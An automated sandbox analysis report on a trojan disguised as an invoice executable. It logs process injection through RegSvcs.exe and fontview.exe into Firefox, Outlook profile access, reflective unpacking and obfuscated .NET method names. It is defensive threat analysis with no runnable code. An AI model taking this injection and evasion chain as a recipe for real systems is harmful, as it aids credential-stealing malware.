            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2FE0 NtCreateFile,4_2_014A2FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2F90 NtProtectVirtualMemory,4_2_014A2F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2FA0 NtQuerySection,4_2_014A2FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2FB0 NtResumeThread,4_2_014A2FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2E30 NtWriteVirtualMemory,4_2_014A2E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2EE0 NtQueueApcThread,4_2_014A2EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2E80 NtReadVirtualMemory,4_2_014A2E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2EA0 NtAdjustPrivilegesToken,4_2_014A2EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A3010 NtOpenDirectoryObject,4_2_014A3010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A3090 NtSetValueKey,4_2_014A3090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A39B0 NtGetContextThread,4_2_014A39B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A3D70 NtOpenThread,4_2_014A3D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A3D10 NtOpenProcessToken,4_2_014A3D10
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB4650 NtSuspendThread,LdrInitializeThunk,12_2_04AB4650
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB4340 NtSetContextThread,LdrInitializeThunk,12_2_04AB4340
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_04AB2CA0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2C60 NtCreateKey,LdrInitializeThunk,12_2_04AB2C60
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04AB2C70
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_04AB2DF0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2DD0 NtDelayExecution,LdrInitializeThunk,12_2_04AB2DD0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_04AB2D30
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2D10 NtMapViewOfSection,LdrInitializeThunk,12_2_04AB2D10
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_04AB2E80
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2EE0 NtQueueApcThread,LdrInitializeThunk,12_2_04AB2EE0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2FB0 NtResumeThread,LdrInitializeThunk,12_2_04AB2FB0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2FE0 NtCreateFile,LdrInitializeThunk,12_2_04AB2FE0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2F30 NtCreateSection,LdrInitializeThunk,12_2_04AB2F30
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2AF0 NtWriteFile,LdrInitializeThunk,12_2_04AB2AF0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2AD0 NtReadFile,LdrInitializeThunk,12_2_04AB2AD0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_04AB2BA0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2BE0 NtQueryValueKey,LdrInitializeThunk,12_2_04AB2BE0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04AB2BF0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2B60 NtClose,LdrInitializeThunk,12_2_04AB2B60
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB35C0 NtCreateMutant,LdrInitializeThunk,12_2_04AB35C0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB39B0 NtGetContextThread,LdrInitializeThunk,12_2_04AB39B0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2CF0 NtOpenProcess,12_2_04AB2CF0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2CC0 NtQueryVirtualMemory,12_2_04AB2CC0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2C00 NtQueryInformationProcess,12_2_04AB2C00
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2DB0 NtEnumerateKey,12_2_04AB2DB0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2D00 NtSetInformationFile,12_2_04AB2D00
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2EA0 NtAdjustPrivilegesToken,12_2_04AB2EA0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2E30 NtWriteVirtualMemory,12_2_04AB2E30
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2FA0 NtQuerySection,12_2_04AB2FA0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2F90 NtProtectVirtualMemory,12_2_04AB2F90
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2F60 NtCreateProcessEx,12_2_04AB2F60
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2AB0 NtWaitForSingleObject,12_2_04AB2AB0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB2B80 NtQueryInformationFile,12_2_04AB2B80
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB3090 NtSetValueKey,12_2_04AB3090
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB3010 NtOpenDirectoryObject,12_2_04AB3010
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB3D10 NtOpenProcessToken,12_2_04AB3D10
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04AB3D70 NtOpenThread,12_2_04AB3D70
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A54FD0 NtCreateFile,12_2_02A54FD0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A55240 NtClose,12_2_02A55240
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A55370 NtAllocateVirtualMemory,12_2_02A55370
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A551C0 NtDeleteFile,12_2_02A551C0
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A55100 NtReadFile,12_2_02A55100
            Source: Invoice_&_SOA_ready_for_dispatch.exe, 00000000.00000002.1262073362.000000000122E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Invoice_&_SOA_ready_for_dispatch.exe
            Source: Invoice_&_SOA_ready_for_dispatch.exe, 00000000.00000000.1231117286.0000000000C4E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegpHbg.exeF vs Invoice_&_SOA_ready_for_dispatch.exe
            Source: Invoice_&_SOA_ready_for_dispatch.exe, 00000000.00000002.1267129512.0000000007560000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Invoice_&_SOA_ready_for_dispatch.exe
            Source: Invoice_&_SOA_ready_for_dispatch.exeBinary or memory string: OriginalFilenamegpHbg.exeF vs Invoice_&_SOA_ready_for_dispatch.exe
            Source: Invoice_&_SOA_ready_for_dispatch.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Invoice_&_SOA_ready_for_dispatch.exeReversingLabs: Detection: 42%
            Source: Invoice_&_SOA_ready_for_dispatch.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exe
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exeProcess created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SysWOW64\fontview.exe
            Source: C:\Windows\SysWOW64\fontview.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exeProcess created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SysWOW64\fontview.exeJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice_&_SOA_ready_for_dispatch.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeFile created: C:\Users\user\AppData\Local\Temp\2N-F32-85Jump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@14/11
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, wXBrPU2mKX2DW6Sp7G.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, wXBrPU2mKX2DW6Sp7G.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, moU0AkpAA5e5deHjGQ.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, moU0AkpAA5e5deHjGQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, moU0AkpAA5e5deHjGQ.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, moU0AkpAA5e5deHjGQ.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, moU0AkpAA5e5deHjGQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, moU0AkpAA5e5deHjGQ.csSecurity API names: _0020.AddAccessRule
            Source: Invoice_&_SOA_ready_for_dispatch.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeMutant created: \Sessions\1\BaseNamedObjects\GxEmeREskI
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\fontview.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Invoice_&_SOA_ready_for_dispatch.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Invoice_&_SOA_ready_for_dispatch.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: firefox.pdbP source: fontview.exe, 0000000C.00000003.1583119919.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: fontview.pdbGCTL source: RegSvcs.exe, 00000004.00000002.1351063486.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000002.3734199569.00000000007FE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: fontview.pdb source: RegSvcs.exe, 00000004.00000002.1351063486.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000002.3734199569.00000000007FE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xIXlFDyvSnsfUSfsjsGwj.exe, 0000000B.00000000.1274005512.0000000000CBE000.00000002.00000001.01000000.0000000C.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000002.3728661562.0000000000CBE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: RegSvcs.pdb, source: fontview.exe, 0000000C.00000002.3736597685.0000000004DA3000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3733416579.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000000.1406933440.0000000002CF3000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1583264064.000000003F053000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1353081257.0000000004896000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1351034381.00000000046EF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, fontview.exe, 0000000C.00000003.1353081257.0000000004896000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1351034381.00000000046EF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RegSvcs.pdb source: fontview.exe, 0000000C.00000002.3736597685.0000000004DA3000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000C.00000002.3733416579.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, xIXlFDyvSnsfUSfsjsGwj.exe, 0000000E.00000000.1406933440.0000000002CF3000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1583264064.000000003F053000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: firefox.pdb source: fontview.exe, 0000000C.00000003.1583119919.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1531285109.0000000007D1D000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: Invoice_&_SOA_ready_for_dispatch.exe, --.cs.Net Code: _0002
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, moU0AkpAA5e5deHjGQ.cs.Net Code: LsT03lLd9Q System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.43ae830.2.raw.unpack, moU0AkpAA5e5deHjGQ.cs.Net Code: LsT03lLd9Q System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.5670000.3.raw.unpack, hA.cs.Net Code: wP
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.5670000.3.raw.unpack, hA.cs.Net Code: Rd System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\Invoice_&_SOA_ready_for_dispatch.exeCode function: 0_2_072B64D5 push FFFFFF8Bh; iretd 0_2_072B64D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040D053 push ebx; ret 4_2_0040D055
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040183F push ecx; ret 4_2_00401841
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004130F2 push ecx; ret 4_2_004130F3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00423153 pushfd ; iretd 4_2_00423168
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041B159 push ss; iretd 4_2_0041B15A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041095B push edx; ret 4_2_0041097E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00410963 push edx; ret 4_2_0041097E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042B9E2 push eax; ret 4_2_0042B9E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00414224 pushfd ; iretd 4_2_00414225
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041A228 pushad ; retf 4_2_0041A229
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402363 push ecx; ret 4_2_0040236D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402308 push ecx; ret 4_2_0040236D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040D325 push gs; ret 4_2_0040D32D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00417BD9 push edi; retf 4_2_00417BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00403390 push eax; ret 4_2_00403392
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040148D push ecx; ret 4_2_004015A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00401490 push ecx; ret 4_2_004015A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00418584 push ds; retf 4_2_0041859D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041859E push ds; retf 4_2_0041859D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004015A5 push ecx; ret 4_2_004015A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00417DB6 push esi; ret 4_2_00417DB7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041466B push edi; ret 4_2_0041466C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004016D4 push ecx; ret 4_2_004016D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00401690 push ecx; ret 4_2_004016B5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040CF05 push eax; retf 4_2_0040CF0E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00412790 push cs; retf 4_2_00412794
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014609AD push ecx; mov dword ptr [esp], ecx4_2_014609B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0143135E push eax; iretd 4_2_01431369
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_04A709AD push ecx; mov dword ptr [esp], ecx12_2_04A709B6
            Source: C:\Windows\SysWOW64\fontview.exeCode function: 12_2_02A422B8 push cs; ret 12_2_02A423AA
            Source: initial sampleStatic PE information: section name: .text entropy: 7.937047832644545
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, OCeGR9WhUIbmo58hGM.csHigh entropy of concatenated method names: 'Dispose', 'S2b4OCjSNc', 'z6aK5hHNRL', 'ji6mm6OVSD', 'DHq4gmhxKc', 'Id04zJUbLY', 'ProcessDialogKey', 'LZcKXcnAp6', 'PiGK4Z2w8H', 'BWMKKHuINe'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, FhqF3be3IiJ78OZX0B.csHigh entropy of concatenated method names: 'iJD9s1ruR2', 'RZC9Lnny3K', 'XIn9wNksZP', 'pgZwgjk7f9', 'ixywze9IUG', 'q4x9Xso9P0', 'd1V94J1Cvh', 'QQ49KvIbHY', 'F699eYUr3W', 'SEF901dK1p'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, hqa0uvwF8y24dfnEmR.csHigh entropy of concatenated method names: 'xdi9jIR5Cj', 'TVW96JE1bE', 'mDg93v7iZV', 'piZ9xQGFV4', 'p0F9VlrsOU', 'rvr9TPPOuw', 'K6D9yUaS6B', 'YbE9JbEYcs', 'ou59R3mIPE', 'fLD9i5oWTG'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, CWH5un3Y7hXN01WGKc4.csHigh entropy of concatenated method names: 'Ng7tj8HcP9', 'ddQt6kFZxA', 'PTIt3Ashuo', 'vLStx16EMM', 'ut7tVGA6Tm', 'Q6XtTbx57d', 'fU8tyjDw7B', 'O1OtJrcYm2', 'mgNtRGSttm', 'hKptiZ4Rip'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, k7qEmYaQgpXjRvxX0y.csHigh entropy of concatenated method names: 'SjkvHLySEw', 'bQHvg3LIxt', 'KIPSX8Gxm8', 'tkKS4TcLdk', 'a2VvhVIwEt', 'aBgvDnrSRK', 'rUdvURaZIO', 'RkmvMB83U2', 'DnLvkEt5ye', 'LAivAcADEf'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, kn3HsVKGcYhQIYc6U1.csHigh entropy of concatenated method names: 'Hag3CTPFA', 'jFcxeDImu', 'BAeTyTbNs', 'cyGy5olns', 'tAmRn63Dl', 'kXSiGOjk5', 'AAdq2s7cY5xMiw0S3I', 'UHK7AioHjQ2GhK5bYD', 'BDYSiQPxW', 'wyrIH3V5Y'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, GiG0pYCKrDVP3rTfDp.csHigh entropy of concatenated method names: 'QU1uJIMdBL', 'jJjuR91ERu', 'Mqku7qyntM', 'eWZu5Q3MLF', 't3ZuC4anai', 'ptsuYEV1L7', 'FYlu118j8i', 'TOPublhwIa', 'SrcuFUgGL7', 'guDuhpAml1'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, aOMcGCJjyGfal9CoD2.csHigh entropy of concatenated method names: 'iCUaVfcOxe', 'KUtaybPXFa', 'SNMLGyP8Zw', 'DNBLC2U4E6', 'NNnLY7GqKY', 'ttSLEliY9Y', 'qLfL1iiLUe', 'gPpLbZdS26', 'rdwLQWrCBs', 'LCYLF1e4bs'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, RFebm5uyGmJYMUbdFA.csHigh entropy of concatenated method names: 'UG9LxeiU1t', 'XeOLT3nAsA', 'SqvLJb2Jlv', 'jBWLRUNZwd', 'g76L2DHYYY', 'LnKL8hbaco', 'vySLvX67EA', 'PUDLStN0oX', 'yHOLtfy8uH', 'EoGLIXjoEC'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, moU0AkpAA5e5deHjGQ.csHigh entropy of concatenated method names: 'EPwelUQ884', 'cFNesYs68v', 'KaoeWPZuJP', 'N0KeLYXxo1', 'UOwea72VT0', 'tZ7ewqQkyQ', 'MWie9a3EFM', 'tjoedRcg49', 's5JeBI9oPS', 'ikyeqg79at'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, wXBrPU2mKX2DW6Sp7G.csHigh entropy of concatenated method names: 'jA6WMF2PhT', 'gjWWkLwcOc', 'VZ3WAIa5Yu', 'nlGWpNvBFu', 'HKPWnh41p0', 'w4JWZmZ6Qe', 'fxuWPI9OlX', 'qejWHlbSq5', 'kpYWOrI9Xq', 'md9WgNafeT'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, VAe6BLDV3qOgFyVjiC.csHigh entropy of concatenated method names: 'wh52Fr2Kpv', 'PyF2DHNFOf', 'HtS2MYNhyD', 'VVc2kgYpOB', 'qCd25KCW0E', 'xf72GqwFMV', 'sgo2C6gQsa', 'G6Y2YTkWHd', 'npY2EDTgeN', 'NGE21un9CM'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, pwk0XiziCPB2HQD6SY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E5ItuwumBb', 'eZTt2dfUIh', 'rdwt8TGKI4', 'YsYtvmcWNv', 'h9MtSRhCQ9', 'hh6ttFNuSj', 'uuRtIqqPR5'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, mphZeO71kLwSC61AIp.csHigh entropy of concatenated method names: 'BIFt4C3NJl', 'KFQteGELqR', 'Y88t06BrZL', 'DvKtsRQjFt', 'OH9tWjF4cC', 'naUtaOSbBU', 'N5ntwd2yfJ', 'dd0SPO5AMe', 'GqOSHG9gdJ', 'E57SOPTmXY'
            Source: 0.2.Invoice_&_SOA_ready_for_dispatch.exe.7560000.5.raw.unpack, wuWA6eL3mDAw53PRlj.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nDBKOIW0du', 'fpiKgjjmO3', 'HIAKzTxLu2', 'OUDeXdMOf7', 'UWhe4OgO0r', 'eQ6eKxuM6Z', 'Ndneeljn2S', 'OpPg46zMp7N97AtbiF'
